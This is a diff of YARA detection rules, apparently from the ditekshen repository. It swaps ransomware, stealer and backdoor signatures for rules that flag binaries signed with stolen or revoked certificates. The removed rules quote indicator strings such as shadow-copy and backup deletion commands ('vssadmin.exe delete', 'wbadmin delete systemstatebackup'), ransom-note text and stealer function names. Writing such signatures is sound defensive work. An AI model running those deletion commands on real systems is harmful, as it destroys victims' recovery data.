-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2486-L2504"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6229-L6240"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f3718e9091b09e0f47ecd6715a3a2c160ede6ab9fb144e7ed115dd5a25c8e379"
+		logic_hash = "768b2cb64f7ce359285721bbfd2f2f6aac4065ec234dc091933d962a7f0ab79a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Ransomware.Nibiru"
-
-	strings:
-		$s1 = ".encrypt" fullword wide
-		$s2 = "crypted" fullword wide
-		$s3 = ".Nibiru" fullword wide
-		$s4 = "Encryption Complete" fullword wide
-		$s5 = "All your files,documents,important datas,mp4,mp3 and anything valuable" ascii
-		$s6 = "EncryptOrDecryptFile" fullword ascii
-		$s7 = "get_hacker" ascii
-		$s8 = "/C choice /C Y /N /D Y /T 3 & Del \"" fullword wide
-		$s9 = "Once You pay,you get the KEY to decrypt files" ascii
-		$pdb = "\\Projects\\Nibiru\\Nibiru\\obj\\x86\\Release\\Nibiru.pdb" ascii
+		thumbprint = "0cdf4e992af760e59f3ea2f1648804d2a2b47bbc"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 7 of them or ( $pdb and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lespeed Technology Co., Ltd" and pe.signatures [ i ] . serial == "2e:4a:27:9b:de:2e:b6:88:e8:ab:30:f5:90:4f:a8:75" )
 }
-rule DITEKSHEN_MALWARE_Win_Medusalocker : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Fbe6758Ae785D7C678A4Ad8De5C3F7E6 : FILE
 {
 	meta:
-		description = "Detects MedusaLocker ransomware"
-		author = "ditekshen"
-		id = "06b7645f-228d-5ec1-9b82-88caee447a5c"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "4d080acc-fb11-5e4d-9c59-562f30376936"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2506-L2537"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6242-L6253"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0e2a0a9f12f550a5c6a11731710e0dc2c2e26d17f43d2385bf6e298518631771"
+		logic_hash = "c6d84435c5c4f71696ce0414c87216bbb0603cb75d6e37abaf73e3708904032e"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Ransomware.MedusaLocker"
-
-	strings:
-		$x1 = "\\MedusaLockerInfo\\MedusaLockerProject\\MedusaLocker\\Release\\MedusaLocker.pdb" ascii
-		$x2 = "SOFTWARE\\Medusa" wide
-		$x3 = "=?utf-8?B?0RFQctTF0YDQcNC60IXQvdC+IEludGVybmV0IED4cGxvseVyIDEz?=" ascii
-		$s1 = "Recovery_Instructions.mht" fullword wide
-		$s2 = "README_LOCK.TXT" fullword wide
-		$s3 = "C:\\Users\\Public\\Desktop" wide
-		$s4 = "[LOCKER] " wide
-		$s5 = "TmV3LUl0ZW0gJ2" ascii
-		$s6 = "<HEAD>=20" ascii
-		$s7 = "LIST OF ENCRYPTED FILES" ascii
-		$s8 = "KEY.FILE" ascii
-		$cmd1 = { 2f 00 63 00 20 00 64 00 65 00 6c 00 20 00 00 00 20 00 3e 00 3e 00 20 00 4e 00 55 00 4c 00 }
-		$cmd2 = "vssadmin.exe delete" wide nocase
-		$cmd3 = "bcdedit.exe /set {default}" wide
-		$cmd4 = "wbadmin delete systemstatebackup" wide nocase
-		$mut1 = "{8761ABBD-7F85-42EE-B272-A76179687C63}" fullword wide
-		$mut2 = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" fullword wide
-		$mut3 = "{6EDD6D74-C007-4E75-B76A-E5740995E24C}" fullword wide
-		$ext1 = { 2e 00 52 00 65 00 61 00 64 00 49 00 6e 00 73 00
-                  74 00 72 00 75 00 63 00 74 00 69 00 6f 00 6e 00
-                  73 00 00 00 00 00 00 00 2e 00 6b 00 65 00 76 00
-                  65 00 72 00 73 00 65 00 6e }
-		$ext2 = ".exe,.dll,.sys,.ini,.lnk,.rdp,.encrypted" fullword ascii
+		thumbprint = "bd1958f0306fc8699e829541cd9b8c4fe0e0c6da920932f2cd4d78ed76bda426"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and ( 4 of ( $s* ) or 1 of ( $mut* ) ) ) or 6 of ( $s* ) or ( 1 of ( $mut* ) and 2 of ( $cmd* ) ) or ( 1 of ( $ext* ) and 5 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HORUM" and pe.signatures [ i ] . serial == "fb:e6:75:8a:e7:85:d7:c6:78:a4:ad:8d:e5:c3:f7:e6" )
 }
-rule DITEKSHEN_MALWARE_Win_Ransomexx : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00A73B6D821F84Db4451D6Eedd62C42848 : FILE
 {
 	meta:
-		description = "Detects RansomEXX ransomware"
-		author = "ditekshen"
-		id = "4d1294de-d73c-5f9c-adb7-18ce5b5aca9f"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "c7533bc5-7d83-550e-a36c-eb459f2be842"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2539-L2555"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6255-L6266"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "351398d89b847b3439fa58b7aab50f3c6e48be27877d3f8b85cc78e994413ecc"
+		logic_hash = "448527bcbe2851bffefabe06a58e3ca68c092a2080041c51acacad3d5119aa0c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Ransomware.RansomEXX"
-
-	strings:
-		$id = "ransom.exx" ascii
-		$s1 = "!TXDOT_READ_ME!.txt" fullword wide
-		$s2 = "debug.txt" fullword wide
-		$s3 = ".txd0t" fullword wide
-		$s4 = "crypt_detect" fullword wide
-		$s5 = "powershell.exe" fullword wide
-		$s6 = "cipher.exe" fullword ascii wide
-		$s7 = "?ReflectiveLoader@@" ascii
+		thumbprint = "eca61ad880741629967004bfc40bf8df6c9f0794"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( $id and 3 of ( $s* ) ) or all of ( $* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Mht Holding Vinderup ApS" and pe.signatures [ i ] . serial == "00:a7:3b:6d:82:1f:84:db:44:51:d6:ee:dd:62:c4:28:48" )
 }
-rule DITEKSHEN_MALWARE_Win_Quasarstealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_500D76B1B4Bfaf4A131F027668Fea2D3 : FILE
 {
 	meta:
-		description = "Detects Quasar infostealer"
-		author = "ditekshen"
-		id = "d0d532fe-bd0a-560a-8570-f6038d694338"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "670138fc-7f2f-5145-8488-196912292ef7"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2557-L2572"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6268-L6279"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4b6ab49992db4d7bf4404d51b0ef1773249de89545ec31176ad45d00803ba703"
+		logic_hash = "a4f626e5ae9d273723814b0d944b067e70714e10776600a1bd0f90af31c1146a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.QuasarStealer"
-
-	strings:
-		$s1 = "PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null" fullword ascii
-		$s2 = "DQuasar.Common, Version=1.4.0.0, Culture=neutral, PublicKeyToken=null" fullword ascii
-		$s3 = "Process already elevated." fullword wide
-		$s4 = "get_PotentiallyVulnerablePasswords" fullword ascii
-		$s5 = "GetKeyloggerLogsDirectory" ascii
-		$s6 = "set_PotentiallyVulnerablePasswords" fullword ascii
-		$s7 = "BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>" ascii
+		thumbprint = "fa491e71d98c7e598e32628a6272a005df86b196"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FviSBJQX" and pe.signatures [ i ] . serial == "50:0d:76:b1:b4:bf:af:4a:13:1f:02:76:68:fe:a2:d3" )
 }
-rule DITEKSHEN_MALWARE_Win_Bandook : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_54Cd7Ae1C27F1421136Ed25088F4979A : FILE
 {
 	meta:
-		description = "Detects Bandook backdoor"
-		author = "ditekshen"
-		id = "c74bd688-c79e-5939-93a8-c2cd9f2cd60e"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "2f7a0a34-6650-59d1-acf9-5ded0317ee6f"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2676-L2705"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6281-L6292"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bff09f769aae890d81efe9926cc8ce85c1caa4eeeb6bc7d2321d2d906ac8d6cf"
+		logic_hash = "2b94ccd7f85a2b21edaf4b28f14827b399cdb82307c20320f77eb775c05751f1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.Bandook"
-
-	strings:
-		$s1 = "\"%sLib\\dpx.pyc\" \"%ws\" \"%ws\" \"%ws\" \"%ws\" \"%ws\"" fullword wide
-		$s2 = "%s\\usd\\dv-%s.dat" fullword ascii
-		$s3 = "%sprd.dat" fullword ascii
-		$s4 = "%sfile\\shell\\open\\command" fullword ascii
-		$s5 = "explorer.exe , %s" fullword ascii
-		$f1 = "CaptureScreen" fullword ascii
-		$f2 = "StartShell" fullword ascii
-		$f3 = "ClearCred" fullword ascii
-		$f4 = "GrabFileFromDevice" fullword ascii
-		$f5 = "PutFileOnDevice" fullword ascii
-		$f6 = "ChromeInject" fullword ascii
-		$f7 = "StartFileMonitor" fullword ascii
-		$f8 = "DisableMouseCapture" fullword ascii
-		$f9 = "StealUSB" fullword ascii
-		$f10 = "DDOSON" fullword ascii
-		$f11 = "InstallMac" fullword ascii
-		$f12 = "SendCam" fullword ascii
-		$x1 = "RTC-TGUBP" fullword ascii
-		$x2 = "AVE_MARIA" fullword ascii
+		thumbprint = "acde047c3d7b22f87d0e6d07fe0a3b734ad5f8ac"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 6 of ( $f* ) or ( 2 of ( $s* ) and 3 of ( $f* ) ) or ( all of ( $x* ) and ( 2 of ( $f* ) or 3 of ( $s* ) ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABBYMAJUTA LTD LIMITED" and pe.signatures [ i ] . serial == "54:cd:7a:e1:c2:7f:14:21:13:6e:d2:50:88:f4:97:9a" )
 }
-rule DITEKSHEN_MALWARE_Win_Kimsuky : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_65Efa92A4164A3A2D888B5Cf8Ff073C8 : FILE
 {
 	meta:
-		description = "Detects Kimsuky backdoor"
-		author = "ditekshen"
-		id = "6216b874-13f1-5283-9d17-90b7ca6996f8"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "07392a87-7d81-58c1-8dd6-2a9cbc8caa6b"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2707-L2730"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6294-L6305"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9f9e64a9cfb3f61bc6b355035c5f0644e4750b740e05cb557c6183c7acfc5a19"
+		logic_hash = "189f154d5b71bea9c06cd2c79d2460a1fb8cc9e0670a9ef8545e3abad80c8a06"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.Kimsuky"
-
-	strings:
-		$s1 = "Win%d.%d.%dx64" fullword ascii
-		$s2 = ".zip" fullword ascii
-		$s3 = ".enc" fullword ascii
-		$s4 = "&p2=a" fullword ascii
-		$s5 = "Content-Disposition: form-data; name=\"binary\"; filename=\"" fullword ascii
-		$s6 = "%s/?m=a&p1=%s&p2=%s-%s-v%d" fullword ascii
-		$s7 = "/?m=b&p1=" fullword ascii
-		$s8 = "/?m=c&p1=" fullword ascii
-		$s9 = "/?m=d&p1=" fullword ascii
-		$s10 = "http://%s/%s/?m=e&p1=%s&p2=%s&p3=%s" fullword ascii
-		$s11 = "taskkill.exe /im iexplore.exe /f" fullword ascii
-		$s12 = "GetParent" fullword ascii
-		$s13 = "DllRegisterServer" fullword ascii
-		$dll1 = "AutoUpdate.dll" fullword ascii
-		$dll2 = "dropper-ie64.dll" fullword ascii
+		thumbprint = "928246cd6a0ee66095a43ae06a696b4c63c6ac24"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $dll* ) and 7 of ( $s* ) ) or ( 11 of ( $* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ghisler Software GmbH" and pe.signatures [ i ] . serial == "65:ef:a9:2a:41:64:a3:a2:d8:88:b5:cf:8f:f0:73:c8" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlagent03 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ad0A958Cdf188Bed43154A54Bf23Afba : FILE
 {
 	meta:
-		description = "Detects known Delphi downloader agent downloading second stage payload, notably from discord"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "18493e3d-224f-5000-8e44-9ffda9c65cf0"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "0b42f6fd-732c-5802-b616-774a1da9e3aa"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2732-L2753"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6307-L6321"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dea63edd48759fd04875e2eb8ac8b00ff801767f071337c667e31c15f0925cdc"
+		logic_hash = "6031cb276cbb419789a3f3e57654dd9569feb612b0aebc2b72ae8b644f07bca9"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.DLAgent03"
-
-	strings:
-		$delph1 = "FastMM Borland Edition" fullword ascii
-		$delph2 = "SOFTWARE\\Borland\\Delphi" ascii
-		$v1_1 = "InternetOpenUrlA" fullword ascii
-		$v1_2 = "CreateFileA" fullword ascii
-		$v1_3 = "WriteFile" fullword ascii
-		$v2_1 = "WinHttp.WinHttpRequest.5.1" fullword ascii
-		$v2_2 = { 6f 70 65 6e ?? ?? ?? ?? ?? 73 65 6e 64 ?? ?? ?? ?? 72 65 73 70 6f 6e 73 65 74 65 78 74 }
-		$url1 = "https://discord.com/" fullword ascii
-		$url2 = "http://www.superutils.com" fullword ascii
-		$url3 = "http://www.xboxharddrive.com" fullword ascii
+		thumbprint = "7d851e785ad44eb15d5cdf9c33e10fe8f49616e8"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of ( $delph* ) and 1 of ( $url* ) and ( all of ( $v1* ) or 1 of ( $v2* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RHM Ltd" and ( pe.signatures [ i ] . serial == "ad:0a:95:8c:df:18:8b:ed:43:15:4a:54:bf:23:af:ba" or pe.signatures [ i ] . serial == "00:ad:0a:95:8c:df:18:8b:ed:43:15:4a:54:bf:23:af:ba" ) )
 }
-rule DITEKSHEN_MALWARE_Win_Salfram : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_05Abac07F8D0Ce567F7D75Ee047Efee2 : FILE
 {
 	meta:
-		description = "Detects Salfram executables"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "323e1c8e-2184-5831-9af5-a460c55fbf7c"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "17355de3-08a9-585d-bc4f-fd16ff59e2a2"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2755-L2766"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6323-L6334"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "19d7934727baa870dcd3ec77ba596cd64e49763477ba3feb7baec5ab6d3866d3"
+		logic_hash = "0196ebd0b5821863c99676907a972e214f46411650fe20557e9f919609d12659"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort2_sid = "920085-920087"
-		snort3_sid = "920085"
-		clamav_sig = "MALWARE.Win.Trojan.Salfram"
-
-	strings:
-		$s1 = "!This Salfram cannot be run in DOS mode." fullword ascii
+		thumbprint = "68b32eac87652af4172e40e3764477437e5a5ce9"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ultrareach Internet Corp." and pe.signatures [ i ] . serial == "05:ab:ac:07:f8:d0:ce:56:7f:7d:75:ee:04:7e:fe:e2" )
 }
-rule DITEKSHEN_MALWARE_Win_Hawkeyev9
+
+rule DITEKSHEN_INDICATOR_KB_CERT_62165B335C13A1A847Ce9Acff2B29368 : FILE
 {
 	meta:
-		description = "Detects HawkEyeV9 payload"
-		author = "ditekshen"
-		id = "ca59aa45-fb55-5f9a-a224-8bd2b72ce5ac"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "62cd9a29-023d-5ff4-89cf-a2e74ec66ac4"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2768-L2793"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6336-L6347"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d24111930dd0230c01963a90c9fbbc0a0a71df170c2ca116bb329e6158cb681c"
+		logic_hash = "19e189c49f435f8b2aca0944d0f648a4126f83b7498982a262230e2f69ada8b7"
 		score = 75
 		quality = 75
-		tags = ""
-		clamav_sig = "MALWARE.Win.Trojan.HawkEyeV9"
-
-	strings:
-		$id1 = "HawkEye Keylogger - Reborn v9 - {0} Logs - {1} \\ {2}" wide
-		$id2 = "HawkEye Keylogger - Reborn v9{0}{1} Logs{0}{2} \\ {3}{0}{0}{4}" wide
-		$str1 = "_PasswordStealer" ascii
-		$str2 = "_KeyStrokeLogger" ascii
-		$str3 = "_ScreenshotLogger" ascii
-		$str4 = "_ClipboardLogger" ascii
-		$str5 = "_WebCamLogger" ascii
-		$str6 = "_AntiVirusKiller" ascii
-		$str7 = "_ProcessElevation" ascii
-		$str8 = "_DisableCommandPrompt" ascii
-		$str9 = "_WebsiteBlocker" ascii
-		$str10 = "_DisableTaskManager" ascii
-		$str11 = "_AntiDebugger" ascii
-		$str12 = "_WebsiteVisitorSites" ascii
-		$str13 = "_DisableRegEdit" ascii
-		$str14 = "_ExecutionDelay" ascii
-		$str15 = "_InstallStartupPersistance" ascii
+		tags = "FILE"
+		thumbprint = "c4cfd244d5148c5b03cac093d49af723252b643c"
+		importance = 20
 
 	condition:
-		int16 ( 0 ) == 0x5a4d and ( 1 of ( $id* ) or 5 of ( $str* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "t55555Prh" and pe.signatures [ i ] . serial == "62:16:5b:33:5c:13:a1:a8:47:ce:9a:cf:f2:b2:93:68" )
 }
-rule DITEKSHEN_MALWARE_Win_Hyperbro : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4Cdffb4F02C55Ae60A099652605Da274 : FILE
 {
 	meta:
-		description = "Detects HyperBro (class names) payload"
+		description = "Enigma Protector Demo Certificate"
 		author = "ditekSHen"
-		id = "539b796d-297b-5e2f-84df-282ceaa57bd4"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "843929be-68e5-56b0-99fc-f5d71b91c3cf"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2795-L2813"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6366-L6377"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f6e86ef963de885e0bf92ead075e265618c0745104d223302edd824d409c45cd"
+		logic_hash = "1b655f42302bed2091aaa5d37156c68eaf812f0c287bf42b24942a8b845b7476"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.HyperBro"
-
-	strings:
-		$s1 = "VTClipboardInfo" ascii wide
-		$s2 = "VTClipboardMgr" ascii wide
-		$s3 = "VTFileRename" ascii wide
-		$s4 = "VTFileRetime" ascii wide
-		$s5 = "VTKeyboardInfo" ascii wide
-		$s6 = "VTKeyboardMgr" ascii wide
-		$s7 = "VTRegeditKeyInfo" ascii wide
-		$s8 = "VTRegeditMgr" ascii wide
-		$s9 = "VTRegeditValueInfo" ascii wide
-		$s10 = "VTFileDataRes" ascii wide
+		thumbprint = "4a2d33148aadf947775a15f50535842633cc3442"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 9 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DEMO" and pe.signatures [ i ] . serial == "4c:df:fb:4f:02:c5:5a:e6:0a:09:96:52:60:5d:a2:74" )
 }
-rule DITEKSHEN_MALWARE_Linux_UNK01 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_25Ad5Ae68C38Ad1021086F4Ffc8Ba470 : FILE
 {
 	meta:
-		description = "Detects unknown/unidentified Linux malware"
+		description = "Enigma Protector CA Certificate"
 		author = "ditekSHen"
-		id = "24c6ff35-9378-5a6b-90d1-9740917b1b72"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "6f1c6d3a-72a1-5c70-9c7d-1616b13767cd"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2815-L2836"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6379-L6390"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8bb4822c1c7e0f52726ecafafa696d83c741257587f351360c5295163c245450"
+		logic_hash = "80b67b804e47fba825fabfee39f9a0aae78a4465b088c28b6f6972acd614bb89"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$f1 = "%sresponse.php?status" ascii
-		$f2 = "%supstream.php?mid=%s&os=%s" ascii fullword
-		$f3 = "%supstream.php?tid=%" ascii
-		$f4 = "%sindex.php?token=%.32s&flag=%d&name=%s" ascii fullword
-		$f5 = "%sactive_off.php?id=%d&uniqu=%d" ascii fullword
-		$s1 = "lock:%i usable num:%i n:%i" fullword ascii
-		$s2 = "tid:%.*s tNumber:%i" fullword ascii
-		$s3 = "init.php" fullword ascii
-		$s4 = "mod_drone" fullword ascii
-		$s5 = "new_mid" fullword ascii
-		$s6 = "&exists[]=" fullword ascii
-		$s7 = "&mod[]=" fullword ascii
-		$s8 = "shutdown" fullword ascii
-		$s9 = "&mac[]=%02X%02X%02X%02X%02X%02X" fullword ascii
+		thumbprint = "a04c0281bc2203a95ef9bd6d9736486449d80905"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x457f and ( 3 of ( $f* ) or 6 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Enigma Protector CA" and pe.signatures [ i ] . serial == "25:ad:5a:e6:8c:38:ad:10:21:08:6f:4f:fc:8b:a4:70" )
 }
-rule DITEKSHEN_MALWARE_Linux_UNK02 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_277Cd16De5D61B9398B645Afe41C09C7 : FILE
 {
 	meta:
-		description = "Detects unknown/unidentified Linux malware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6e62df0d-d329-5e52-af74-2a1f19dc4cca"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "d5ada3bf-322a-5794-aff7-75ff8dd9a7d1"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2838-L2852"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6392-L6403"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4cde21932c27fe3c08495f557b5e086b1fb668d8b5508249891828b9ed48edd4"
+		logic_hash = "dccfd52a3bcc11897d05f5450600dbd2f1f699732341cebed6dda37a76fd5f2d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$rf1 = "[]A\\A]A^A_" ascii
-		$rf2 = "[A\\A]A^A_]" ascii
-		$f1 = "/bin/basH" ascii fullword
-		$f2 = "/proc/seH" ascii fullword
-		$f3 = "/dev/ptsH" ascii fullword
-		$f4 = "pqrstuvwxyzabcde" ascii fullword
-		$f5 = "libnss_%s.so.%d.%d" ascii fullword
+		thumbprint = "11a18b9ba48e2b715202def00c2005a394786b23"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x457f and ( all of ( $f* ) and #rf1 > 3 and #rf2 > 3 )
